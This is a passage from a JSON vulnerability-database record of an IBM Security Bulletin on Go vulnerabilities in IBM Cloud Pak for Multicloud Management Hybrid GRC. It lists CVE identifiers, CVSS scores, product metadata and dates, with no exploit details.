unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSFC4F\",\"label\":\"IBM Cloud Pak for Multicloud Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.0, 2.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-04T21:36:22", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Go affect IBM Cloud Pak for Multicloud Management Hybrid GRC.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17596", "CVE-2020-14039", "CVE-2020-15586", "CVE-2020-16845", "CVE-2020-24553", "CVE-2020-7919", "CVE-2020-9283"], "modified": "2021-02-04T21:36:22", "id": "9639F84E85C1FD3D4C5A89655B415BE95E955B63B48D2B85EF64F81DAC429A11", "href": "https://www.ibm.com/support/pages/node/6412335", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}